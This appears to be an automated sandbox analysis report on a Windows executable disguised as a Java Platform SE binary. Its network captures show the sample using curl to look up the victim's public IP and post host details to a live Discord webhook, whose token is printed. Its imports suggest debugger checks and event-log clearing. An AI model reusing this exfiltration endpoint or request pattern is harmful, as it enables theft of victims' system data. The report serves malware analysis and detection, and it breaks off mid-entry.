                                      Process:C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):290944
                                      Entropy (8bit):6.314868285664843
                                      Encrypted:false
                                      SSDEEP:3072:Ls+53MFulvntAJ7G9bYYfXgzaDiAMwys4NFiBCIuvAxs1Iso91l4HFiijaQr1B59:LbntAJ7G9b3IIyJXhEwDFwlKzFs0
                                      MD5:E181EB699888D8BBBE0B89D41DF77678
                                      SHA1:9A500DEADF901DFB3F63DF1AB2CBC679B27FC660
                                      SHA-256:86C52E999CFD2243EA8E81E6FF8B1C6E15EE176807C7911D5A000341200EB757
                                      SHA-512:11E2562B7848F3463B88A741BF5967467B343FA75458FFCD88E230FA6C1D1E1A0329A7C6092848E4C0AB40EC8E770001F94AD92996F691FE27C9D4C51C2FDB9B
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 47%
                                      Reputation:low
                                      Process:C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Reputation:high, very likely benign file
                                      Preview:[ZoneTransfer]....ZoneId=0
                                      Process:C:\Users\user\AppData\Local\java.exe
                                      File Type:ASCII text, with CRLF, CR line terminators
                                      Category:dropped
                                      Size (bytes):428
                                      Entropy (8bit):3.2974732613601674
                                      Encrypted:false
                                      SSDEEP:6:LOtEswj2SAykymUef/Ff/8UniehCSgOgcdSgOgcuF/vEVvqF//NNlgOgK6n:LOtEz6ykymUe2bwc9cL9cuNkyN7y9t
                                      MD5:2081808514978CF8CF2DDEE073D5DDBD
                                      SHA1:2A655E0F399EF7838B1395EE92B6CFFE879A9A0E
                                      SHA-256:E8F77474AA788475DB0574EDFCD4F5D63B419D73876E75B0006D3F819D21678A
                                      SHA-512:700EEDD649A8B35BB7FD074F9ABF39629485A76A59BF64BC9E792E0308028067AA08F9C3F693BC77E43EB45F663B367240CBEF72C6613B9B42EDB34E7F99113F
                                      Malicious:false
                                      Preview:Webhook sent. Response: % Total % Received % Xferd Average Speed Time Time Time Current... Dload Upload Total Spent Left Speed.... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0.100 483 0 0 100 483 0 633 --:--:-- --:--:-- --:--:-- 633.....
                                      File type:PE32+ executable (console) x86-64, for MS Windows
                                      Entropy (8bit):6.314868285664843
                                      TrID:
                                      • Win64 Executable Console (202006/5) 92.65%
                                      • Win64 Executable (generic) (12005/4) 5.51%
                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                      • DOS Executable Generic (2002/1) 0.92%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:Jx6bD8nM4qW9sL3v.exe
                                      File size:290'944 bytes
                                      MD5:e181eb699888d8bbbe0b89d41df77678
                                      SHA1:9a500deadf901dfb3f63df1ab2cbc679b27fc660
                                      SHA256:86c52e999cfd2243ea8e81e6ff8b1c6e15ee176807c7911d5a000341200eb757
                                      SHA512:11e2562b7848f3463b88a741bf5967467b343fa75458ffcd88e230fa6c1d1e1a0329a7c6092848e4c0ab40ec8e770001f94ad92996f691fe27c9d4c51c2fdb9b
                                      SSDEEP:3072:Ls+53MFulvntAJ7G9bYYfXgzaDiAMwys4NFiBCIuvAxs1Iso91l4HFiijaQr1B59:LbntAJ7G9b3IIyJXhEwDFwlKzFs0
                                      TLSH:185443D23051409AE46765F2AE4ECE20619A39DE92B5C74E36D3AB2FCBC33511477B0B
                                      Icon Hash:928a8e8ea68e8ea2
                                      Entrypoint:0x14000dd98
                                      Entrypoint Section:.text
                                      Digitally signed:true
                                      Imagebase:0x140000000
                                      Subsystem:windows cui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x676BA8A7 [Wed Dec 25 06:39:35 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:6
                                      OS Version Minor:0
                                      File Version Major:6
                                      File Version Minor:0
                                      Subsystem Version Major:6
                                      Subsystem Version Minor:0
                                      Import Hash:6d5db8024793ecbed51b9c77c74726e2
                                      Signature Valid:false
                                      Signature Issuer:CN=JavaPlatformSE, O=Java Platform SE, L=Redmond, S=Washington, C=US
                                      Signature Validation Error:The signature of the certificate cannot be verified
                                      Error Number:-2146869244
Not Before:25/12/2024 07:40:33
Not After:27/01/2026 07:40:33
                                      Subject Chain
                                      • CN=JavaPlatformSE, O=Java Platform SE, L=Redmond, S=Washington, C=US
                                      Version:1
                                      Thumbprint MD5:443C2AE946511AE073AD36F7AF2A47C3
                                      Thumbprint SHA-1:A3D5999CD617AB15070F1E9FE40600BF2273A96D
                                      Thumbprint SHA-256:F243A8747E38EE617248E0365EF58B0A7C70A3083754DD87A8D200E12D516983
                                      Serial:01
                                      Programming Language:
                                      • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x14d2c | 0x190 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x19000 | 0x2dea8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x18000 | 0xd8c | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x45400 | 0x1c80 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x47000 | 0x110 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x11c50 | 0x38 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x11b10 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x10000 | 0x5b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                      .text | 0x1000 | 0xeadf | 0xec00 | efac4e5070bf8589e67c18078c14ddf5 | False | 0.4986261917372881 | data | 6.183615469000689 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata | 0x10000 | 0x6986 | 0x6a00 | 11d61899386f43b457b708a0696704e7 | False | 0.4224277712264151 | data | 5.168018809604822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data | 0x17000 | 0xf00 | 0xa00 | 157509527a0126437cf9155d09698fcf | False | 0.200390625 | data | 3.928920356631935 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .pdata | 0x18000 | 0xd8c | 0xe00 | 98096472afc420f731802132a2ac25dd | False | 0.46484375 | data | 4.772663047851322 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .rsrc | 0x19000 | 0x2dea8 | 0x2e000 | 9e2d061b3beb1a8f6c101935a3c5414b | False | 0.30647078804347827 | data | 5.805166306881057 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc | 0x47000 | 0x110 | 0x200 | 999cb7eb3ee595af15dabb97b3db2801 | False | 0.4609375 | data | 3.5019216086408944 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                      RT_ICON | 0x19270 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | English | United States | 0.5851063829787234
                                      RT_ICON | 0x196d8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304 | English | United States | 0.46967213114754097
                                      RT_ICON | 0x1a060 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | United States | 0.39141651031894936
                                      RT_ICON | 0x1b108 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | United States | 0.2992738589211618
                                      RT_ICON | 0x1d6b0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | English | United States | 0.24557156353330184
                                      RT_ICON | 0x218d8 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 20736 | English | United States | 0.22093345656192237
                                      RT_ICON | 0x26d60 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864 | English | United States | 0.1813380281690141
                                      RT_ICON | 0x30208 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | United States | 0.14613155092866437
                                      RT_ICON | 0x40a30 | 0x6266 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9994839221913457
                                      RT_GROUP_ICON | 0x46c98 | 0x84 | data | English | United States | 0.75
                                      RT_MANIFEST | 0x46d20 | 0x188 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5892857142857143
                                      DLL | Import
                                      KERNEL32.dll | GetModuleFileNameW, GetFileAttributesW, SetFileAttributesW, CreateToolhelp32Snapshot, Sleep, Process32NextW, LoadLibraryA, QueryPerformanceFrequency, Process32FirstW, CloseHandle, FreeLibrary, CopyFileW, QueryPerformanceCounter, CheckRemoteDebuggerPresent, ReadFile, CreatePipe, GetCurrentProcess, CreateProcessA, GetVolumeInformationW, IsDebuggerPresent, InitializeSListHead, GetSystemTimeAsFileTime, GetConsoleWindow, SetConsoleCtrlHandler, GetModuleHandleW, GetComputerNameW, GetProcAddress, GetLogicalDriveStringsA, GetVersionExW, GetDriveTypeA, GetCurrentThreadId, GetCurrentProcessId, IsProcessorFeaturePresent, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, LocalFree, WaitForSingleObject
                                      USER32.dll | ShowWindow, RemoveMenu, GetSystemMenu
                                      ADVAPI32.dll | ClearEventLogW, RegOpenKeyExA, RegCloseKey, RegQueryValueExA, GetUserNameW, CloseEventLog, OpenEventLogW
                                      SHELL32.dll | SHGetKnownFolderPath
                                      ole32.dll | CoTaskMemFree, CoInitializeEx, CoCreateInstance, CoUninitialize
                                      OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear, VariantInit
                                      MSVCP140.dll | ?uncaught_exceptions@std@@YAHXZ, ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@@Z, ?_Init@locale@std@@CAPEAV_Locimp@12@_N@Z, ?_Xbad_alloc@std@@YAXXZ, ?_Xlength_error@std@@YAXPEBD@Z, ?id@?$codecvt@_WDU_Mbstatet@@@std@@2V0locale@2@A, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z, ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ, ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ, ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z, ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD@Z, ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?_Lock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ, ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAAXXZ, ?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JXZ, ?uflow@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAHXZ, ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J@Z, ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J@Z, ?setbuf@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAPEAV12@PEAD_J@Z, ?sync@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAHXZ, ?imbue@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAAXAEBVlocale@2@@Z, ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?good@ios_base@std@@QEBA_NXZ, ??1?$codecvt@_WDU_Mbstatet@@@std@@MEAA@XZ, ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K@Z, ?out@?$codecvt@_WDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEB_W1AEAPEB_WPEAD3AEAPEAD@Z, ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K@Z, ?_Decref@facet@locale@std@@UEAAPEAV_Facet_base@3@XZ, ?_Incref@facet@locale@std@@UEAAXXZ, ??Bid@locale@std@@QEAA_KXZ, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z, ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, ??1_Lockit@std@@QEAA@XZ, ??0_Lockit@std@@QEAA@H@Z, ?id@?$time_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@2V0locale@2@A, ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ, _Xtime_get_ticks, ?_Getcat@?$time_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z, ?put@?$time_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@QEBA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@AEAVios_base@2@DPEBUtm@@PEBD3@Z, ?getloc@ios_base@std@@QEBA?AVlocale@2@XZ, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ
                                      ntdll.dll | RtlAdjustPrivilege, NtRaiseHardError
                                      gdiplus.dll | GdiplusStartup, GdiplusShutdown
                                      CRYPT32.dll | CryptStringToBinaryA
                                      VCRUNTIME140_1.dll | __CxxFrameHandler4
                                      VCRUNTIME140.dll | __current_exception, memset, _CxxThrowException, memmove, __current_exception_context, strstr, memcmp, __std_terminate, __std_exception_copy, __C_specific_handler, memcpy, __std_exception_destroy
                                      api-ms-win-crt-heap-l1-1-0.dll | _set_new_mode, malloc, _callnewh, free
                                      api-ms-win-crt-stdio-l1-1-0.dll | __stdio_common_vsprintf, _pclose, __stdio_common_vswprintf, __p__commode, _set_fmode, __stdio_common_vswprintf_s, fgets, _popen
                                      api-ms-win-crt-runtime-l1-1-0.dll | exit, _exit, _initterm, __p___argc, __p___argv, _cexit, _c_exit, _register_thread_local_exe_atexit_callback, _get_initial_narrow_environment, _initialize_narrow_environment, _configure_narrow_argv, _initialize_onexit_table, _register_onexit_function, _crt_atexit, _set_app_type, _seh_filter_exe, terminate, _invalid_parameter_noinfo_noreturn, _initterm_e
                                      api-ms-win-crt-string-l1-1-0.dll | _wcsicmp
                                      api-ms-win-crt-math-l1-1-0.dll | _dsign, __setusermatherr
                                      api-ms-win-crt-time-l1-1-0.dll | _gmtime64
                                      api-ms-win-crt-locale-l1-1-0.dll | _configthreadlocale, localeconv
                                      Language of compilation system | Country where language is spoken
                                      English | United States
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Dec 30, 2024 11:13:53.877573013 CET | 62877 | 53 | 192.168.2.5 | 1.1.1.1
                                      Dec 30, 2024 11:13:53.884634972 CET | 53 | 62877 | 1.1.1.1 | 192.168.2.5
                                      Dec 30, 2024 11:13:54.549746037 CET | 56668 | 53 | 192.168.2.5 | 1.1.1.1
                                      Dec 30, 2024 11:13:54.556687117 CET | 53 | 56668 | 1.1.1.1 | 192.168.2.5
                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                      Dec 30, 2024 11:13:53.877573013 CET | 192.168.2.5 | 1.1.1.1 | 0x5fa8 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                                      Dec 30, 2024 11:13:54.549746037 CET | 192.168.2.5 | 1.1.1.1 | 0xa8b2 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                      Dec 30, 2024 11:13:53.884634972 CET | 1.1.1.1 | 192.168.2.5 | 0x5fa8 | No error (0) | api.ipify.org |  | 104.26.12.205 | A (IP address) | IN (0x0001) | false
                                      Dec 30, 2024 11:13:53.884634972 CET | 1.1.1.1 | 192.168.2.5 | 0x5fa8 | No error (0) | api.ipify.org |  | 104.26.13.205 | A (IP address) | IN (0x0001) | false
                                      Dec 30, 2024 11:13:53.884634972 CET | 1.1.1.1 | 192.168.2.5 | 0x5fa8 | No error (0) | api.ipify.org |  | 172.67.74.152 | A (IP address) | IN (0x0001) | false
                                      Dec 30, 2024 11:13:54.556687117 CET | 1.1.1.1 | 192.168.2.5 | 0xa8b2 | No error (0) | discord.com |  | 162.159.128.233 | A (IP address) | IN (0x0001) | false
                                      Dec 30, 2024 11:13:54.556687117 CET | 1.1.1.1 | 192.168.2.5 | 0xa8b2 | No error (0) | discord.com |  | 162.159.137.232 | A (IP address) | IN (0x0001) | false
                                      Dec 30, 2024 11:13:54.556687117 CET | 1.1.1.1 | 192.168.2.5 | 0xa8b2 | No error (0) | discord.com |  | 162.159.136.232 | A (IP address) | IN (0x0001) | false
                                      Dec 30, 2024 11:13:54.556687117 CET | 1.1.1.1 | 192.168.2.5 | 0xa8b2 | No error (0) | discord.com |  | 162.159.138.232 | A (IP address) | IN (0x0001) | false
                                      Dec 30, 2024 11:13:54.556687117 CET | 1.1.1.1 | 192.168.2.5 | 0xa8b2 | No error (0) | discord.com |  | 162.159.135.232 | A (IP address) | IN (0x0001) | false
                                      • api.ipify.org
                                      • discord.com
                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      0 | 192.168.2.5 | 49708 | 104.26.12.205 | 443 | 5776 | C:\Windows\System32\curl.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-12-30 10:13:54 UTC | 77 | OUT | GET / HTTP/1.1
                                      Host: api.ipify.org
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      2024-12-30 10:13:54 UTC | 424 | IN | HTTP/1.1 200 OK
                                      Date: Mon, 30 Dec 2024 10:13:54 GMT
                                      Content-Type: text/plain
                                      Content-Length: 12
                                      Connection: close
                                      Vary: Origin
                                      CF-Cache-Status: DYNAMIC
                                      Server: cloudflare
                                      CF-RAY: 8fa14286ff78428e-EWR
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1558&rtt_var=597&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=715&delivery_rate=1814791&cwnd=222&unsent_bytes=0&cid=c4770ca71d3cc9d0&ts=125&x=0"
                                      2024-12-30 10:13:54 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                      Data Ascii: 8.46.123.189


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      1 | 192.168.2.5 | 49711 | 162.159.128.233 | 443 | 4196 | C:\Windows\System32\curl.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-12-30 10:13:55 UTC | 230 | OUT | POST /api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhm HTTP/1.1
                                      Host: discord.com
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Content-Type: application/json
                                      Content-Length: 483
                                      2024-12-30 10:13:55 UTC | 483 | OUT | Data Ascii: {"embeds":[{"color":16711680,"fields":[{"inline":false,"name":"local user","value":"user"},{"inline":false,"name":"system name","value":"571345"},{"inline":false,"name":"ip address","value":"8.46.123.189"},{"inline":false,"name":"serial number","value":
                                      2024-12-30 10:13:55 UTC | 1350 | IN | HTTP/1.1 204 No Content
                                      Date: Mon, 30 Dec 2024 10:13:55 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Set-Cookie: __dcfduid=c6a792bac69611ef81656a71a21a7c43; Expires=Sat, 29-Dec-2029 10:13:55 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                      x-ratelimit-limit: 5
                                      x-ratelimit-remaining: 4
                                      x-ratelimit-reset: 1735553636
                                      x-ratelimit-reset-after: 1
                                      via: 1.1 google
                                      alt-svc: h3=":443"; ma=86400
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DO8BbmeK7aF81qULJBIHHlvlydLY6q7wZPxUgI8zOa%2Bjemgk0H9hsXBrP44qq5aaw8rWJB53YaHT5FyLz3dYdg99jsHeBe5qxtmGoH3LiU7czOC7lDEfXSr15YYR"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      X-Content-Type-Options: nosniff
                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                      Set-Cookie: __sdcfduid=c6a792bac69611ef81656a71a21a7c4323195f739f745fb859996eb7d20b263716662e1b2541728398f69788aac6422c; Expires=Sat, 29-Dec-2029 10:13:55 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                      Set-Cookie: __cfruid=a6fb67675c6458db05633ea3a4f2045db740914f-1735553635; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                      2024-12-30 10:13:55 UTC | 211 | IN | Data Ascii: Set-Cookie: _cfuvid=WyhTH0svJqAYbI72BHjo1RpAiHzHp4jUvirPStXobwg-1735553635215-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8fa1428b39f00cac-EWR


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      2 | 192.168.2.5 | 49714 | 104.26.12.205 | 443 | 4144 | C:\Windows\System32\curl.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-12-30 10:13:56 UTC | 77 | OUT | GET / HTTP/1.1
                                      Host: api.ipify.org
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      2024-12-30 10:13:57 UTC | 424 | IN | HTTP/1.1 200 OK
                                      Date: Mon, 30 Dec 2024 10:13:57 GMT
                                      Content-Type: text/plain
                                      Content-Length: 12
                                      Connection: close
                                      Vary: Origin
                                      CF-Cache-Status: DYNAMIC
                                      Server: cloudflare
                                      CF-RAY: 8fa14297390542ca-EWR
                                      server-timing: cfL4;desc="?proto=TCP&rtt=2384&min_rtt=2376&rtt_var=907&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=715&delivery_rate=1196231&cwnd=252&unsent_bytes=0&cid=fc6f3507a35fe69a&ts=134&x=0"
                                      2024-12-30 10:13:57 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                      Data Ascii: 8.46.123.189


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      3 | 192.168.2.5 | 49717 | 162.159.128.233 | 443 | 3128 | C:\Windows\System32\curl.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-12-30 10:13:57 UTC | 230 | OUT | POST /api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhm HTTP/1.1
                                      Host: discord.com
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Content-Type: application/json
                                      Content-Length: 483
                                      2024-12-30 10:13:57 UTC | 483 | OUT | Data Ascii: {"embeds":[{"color":16711680,"fields":[{"inline":false,"name":"local user","value":"user"},{"inline":false,"name":"system name","value":"571345"},{"inline":false,"name":"ip address","value":"8.46.123.189"},{"inline":false,"name":"serial number","value":
                                      2024-12-30 10:13:57 UTC | 1354 | IN | HTTP/1.1 204 No Content
                                      Date: Mon, 30 Dec 2024 10:13:57 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Set-Cookie: __dcfduid=c835fb62c69611ef863f966620e4c59f; Expires=Sat, 29-Dec-2029 10:13:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                      strict-transport-security: max-age=31536000; includeSubDomains; preload
                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                      x-ratelimit-limit: 5
                                      x-ratelimit-remaining: 4
                                      x-ratelimit-reset: 1735553639
                                      x-ratelimit-reset-after: 1
                                      via: 1.1 google
                                      alt-svc: h3=":443"; ma=86400
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bfFxL5BkqUOdgq4srbTEipjgsj0H9CNzXuLs4XwCz94rbH2hAqKn2nNKW3CeDFXdPrhlaJPwTchSOlR5Y%2Bkjx%2FGndss9g7V%2FCRpdjfLIhr5opgvmFPsDuyCLrTgl"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      X-Content-Type-Options: nosniff
                                      Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                      Set-Cookie: __sdcfduid=c835fb62c69611ef863f966620e4c59f511aac810e3678fd80b198e49d5880759e6e32fb73411edecef8c7f8789f128d; Expires=Sat, 29-Dec-2029 10:13:57 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                      Set-Cookie: __cfruid=ab78eebfe44a05b76b2400de2d48a71ed5b19135-1735553637; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                      2024-12-30 10:13:57 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 51 4e 37 57 68 61 33 5a 7a 2e 53 43 7a 39 48 33 32 72 65 5a 36 58 6f 52 2e 4b 6a 31 74 4e 55 4e 53 34 69 78 51 6e 36 79 48 76 6f 2d 31 37 33 35 35 35 33 36 33 37 38 32 37 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 61 31 34 32 39 62 33 66 35 33 37 63 39 33 2d 45 57 52 0d 0a 0d 0a
                                      Data Ascii:
                                      Set-Cookie: _cfuvid=QN7Wha3Zz.SCz9H32reZ6XoR.Kj1tNUNS4ixQn6yHvo-1735553637827-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                      CF-RAY: 8fa1429b3f537c93-EWR



                                      Target ID:0
                                      Start time:05:13:52
                                      Start date:30/12/2024
                                      Path:C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe"
                                      Imagebase:0x7ff670fc0000
                                      File size:290'944 bytes
                                      MD5 hash:E181EB699888D8BBBE0B89D41DF77678
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:1
                                      Start time:05:13:52
                                      Start date:30/12/2024
